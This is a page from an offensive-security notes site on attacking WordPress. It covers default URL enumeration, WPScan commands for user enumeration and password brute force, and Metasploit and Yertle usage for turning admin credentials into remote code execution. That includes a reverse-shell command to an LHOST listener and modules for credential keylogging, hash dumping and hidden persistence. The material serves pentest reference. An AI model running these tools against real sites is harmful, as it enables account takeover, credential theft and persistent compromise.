InfoSec Notes
  • InfoSec Notes
  • General
    • External recon
    • Ports scan
    • Bind / reverse shells
    • File transfer / exfiltration
    • Pivoting
    • Passwords cracking
  • Active Directory
    • Recon - Domain Recon
    • Recon - AD scanners
    • Exploitation - NTLM capture and relay
    • Exploitation - Password spraying
    • Exploitation - Domain Controllers CVE
    • Exploitation - Kerberos AS_REP roasting
    • Exploitation - Credentials theft shuffling
    • Exploitation - GPP and shares searching
    • Exploitation - Kerberos Kerberoasting
    • Exploitation - ACL exploiting
    • Exploitation - GPO users rights
    • Exploitation - Active Directory Certificate Services
    • Exploitation - Kerberos tickets usage
    • Exploitation - Kerberos silver tickets
    • Exploitation - Kerberos delegations
    • Exploitation - gMS accounts (gMSAs)
    • Exploitation - Azure AD Connect
    • Exploitation - Operators to Domain Admins
    • Post Exploitation - ntds.dit dumping
    • Post Exploitation - Kerberos golden tickets
    • Post Exploitation - Trusts hopping
    • Post Exploitation - Persistence
  • L7
    • Methodology
    • 21 - FTP
    • 22 - SSH
    • 25 - SMTP
    • 53 - DNS
    • 111 / 2049 - NFS
    • 113 - Ident
    • 135 - MSRPC
    • 137-139 - NetBIOS
    • 161 - SNMP
    • 389 / 3268 - LDAP
    • 445 - SMB
    • 512 / 513 - REXEC / RLOGIN
    • 554 - RTSP
    • 1099 - JavaRMI
    • 1433 - MSSQL
    • 1521 - ORACLE_DB
    • 3128 - Proxy
    • 3306 - MySQL
    • 3389 - RDP
    • 5985 / 5986 - WSMan
    • 8000 - JDWP
    • 9100 - Printers
    • 11211 - memcached
    • 27017 / 27018 - MongoDB
  • Windows
    • Shellcode and PE loader
    • Bypass PowerShell ConstrainedLanguageMode
    • Bypass AppLocker
    • Local privilege escalation
    • Post exploitation
      • Credentials dumping
      • Defense evasion
      • Local persistence
    • Lateral movements
      • Local credentials re-use
      • Over SMB
      • Over WinRM
      • Over WMI
      • Over DCOM
      • CrackMapExec
  • Linux
    • Local privilege escalation
    • Post exploitation
  • DFIR
    • Common
      • Image acquisition and mounting
      • Memory forensics
      • Web logs analysis
      • Browsers forensics
      • Email forensics
      • Docker forensics
    • Windows
      • Artefacts overview
        • Amcache
        • EVTX
        • Jumplist
        • LNKFile
        • MFT
        • Outlook_files
        • Prefetch
        • RecentFilecache
        • RecycleBin
        • Shellbags
        • Shimcache
        • SRUM
        • Timestamps
        • User Access Logging (UAL)
        • UsnJrnl
        • Miscellaneous
      • TTPs analysis
        • Accounts usage
        • Local persistence
        • Lateral movement
        • PowerShell activity
        • Program execution
        • Timestomping
        • EVTX integrity
        • System uptime
        • ActiveDirectory replication metadata
        • ActiveDirectory persistence
    • Linux
      • Artefacts overview
      • TTPs analysis
        • Timestomping
    • Cloud
      • Azure
      • AWS
    • Tools
      • Velociraptor
      • KAPE
      • Dissect
      • plaso
      • Splunk usage
  • Red Team specifics
    • Phishing - Office Documents
    • OpSec Operating Systems environment
    • EDR bypass with EDRSandBlast
    • Cobalt Strike
  • Web applications
    • Recon - Server exposure
    • Recon - Hostnames discovery
    • Recon - Application mapping
    • Recon - Attack surface overview
    • CMS & softwares
      • ColdFusion
      • DotNetNuke
      • Jenkins
      • Jira
      • Ovidentia
      • WordPress
      • WebDAV
    • Exploitation - Overview
    • Exploitation - Authentication
    • Exploitation - LDAP injections
    • Exploitation - Local and remote file inclusions
    • Exploitation - File upload
    • Exploitation - SQL injections
      • SQLMAP.md
      • MSSQL.md
      • MySQL.md
      • SQLite.md
    • Exploitation - NoSQL injections
      • NoSQLMap.md
      • mongoDB.md
    • Exploitation - GraphQL
  • Binary exploitation
    • Linux - ELF64 ROP leaks
    • (Very) Basic reverse
  • Android
    • Basic static analysis
  • Miscellaneous
    • Regex 101
    • WinDbg Kernel
    • Basic coverage guided fuzzing
Powered by GitBook
On this page
  • Overview
  • WordPress default URL
  • WPScan
  • Administrator to RCE
  1. Web applications
  2. CMS & softwares

WordPress

Overview

WordPress is a free and open-source content management system (CMS) developed by the WordPress.org foundation and based on PHP and MySQL.

WordPress is, by far, the most popular website management system in use with a CMS market share of nearly sixty percent and used by more than 60 million websites, including 30.6% of the top 10 million websites as of April 2018.

WordPress' plugin architecture allows users to extend the features and functionality of a website or blog. As of March 2017, WordPress has over 55,286 plugins available.

WordPress default URL

The following files and directories can be found on a default installation of WordPress:

index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-app.php
wp-atom.php
wp-blog-header.php
wp-comments-post.php
wp-commentsrss2.php
wp-config-sample.php
wp-content
wp-cron.php
wp-feed.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-pass.php
wp-rdf.php
wp-register.php
wp-rss2.php
wp-rss.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
...

Refer to the SecLists' Discovery/Web-Content/CMS/wordpress.fuzz.txt wordlist for a more exhaustive list of URL.

WPScan

WPScan is a well-known vulnerability scanner written in Ruby for WordPress which focus on vulnerabilities in WordPress core, themes, and plugins.

The WPScan vulnerability database is public and count, as of December 2018, 11665 vulnerabilities. The database is hosted on the following host:

https://wpvulndb.com/

Usage:

# Update the WordPress Core, themes and plugins vulnerability database
wpscan --update

wpscan --url <URL>

# Enumerate installed plugins | themes | users | timthumbs
wpscan --url <URL> --enumerate < p | t | u | tt >

# Wordlist password brute force on enumerated users using 50 threads
wpscan --url <URL> --wordlist <WORDLIST_PASSWORDS> --threads 50

# Wordlist usernames and password brute force using 50 threads
wpscan <URL> [--username <USERNAME> | --usernames <WORDLIST_USERNAMES>] --wordlist <WORDLIST_PASSWORDS> --threads 50

# Multiple targets scan (all plugins, all themes, config backups, db exports, user enumeration, and password bruteforce) using using interlace.
echo 'wpscan --disable-tls-checks --rua --force --max-threads 50 -e ap,at,cb,dbe,u,m --plugins-detection aggressive --detection-mode aggressive --passwords <PASSWORD_WORDLIST> -o _output_/_cleantarget_-wpscan.txt --url _target_' > wordpress_cmd.txt
interlace -tL <WORDPRESS_HOSTS_FILE> -o <OUTPUT_DIRECTORY> -cL wordpress_cmd.txt

Administrator to RCE

The tools presented below require valid WordPress administrator credentials.

Metasploit

The Metasploit module exploit/unix/webapp/wp_admin_shell_upload can be used to generate a plugin packed with a Metasploit payload and upload it to the WordPress server.

msf> use exploit/unix/webapp/wp_admin_shell_upload

WPForce Yertle

Part of the WPForce suite of Wordpress attack tools, Yertle is a WordPress post-exploitation python script.

The following modules are implemented:

beef            Injects a BeEF hook into website
dbcreds         Prints the database credentials
exit            Terminate the session
hashdump        Dumps all WordPress password hashes
help            Help menu
keylogger       Patches WordPress core to log plaintext credentials
keylog          Displays keylog file
meterpreter     Executes a PHP meterpreter stager (php/meterpreter/reverse_tcp) to connect to metasploit
persist         Creates an admin account that will re-add itself
quit            Terminate the session
shell           Sends a TCP reverse shell to a netcat listener
stealth         Hides Yertle from the plugins page

Usage:

# Bind OS shell including the modules above
python yertle.py -u <USERNAME> -p <PASSWORD> -t <URL> -i
os-shell> help | hashdump | persist | whoami | ...

# Reverse OS shell - works with a netcat listener
python yertle.py -u <USERNAME> -p <PASSWORD> -t <URL> -r -li <LHOST> -lp <LPORT>
PreviousOvidentiaNextWebDAV

Last updated 3 years ago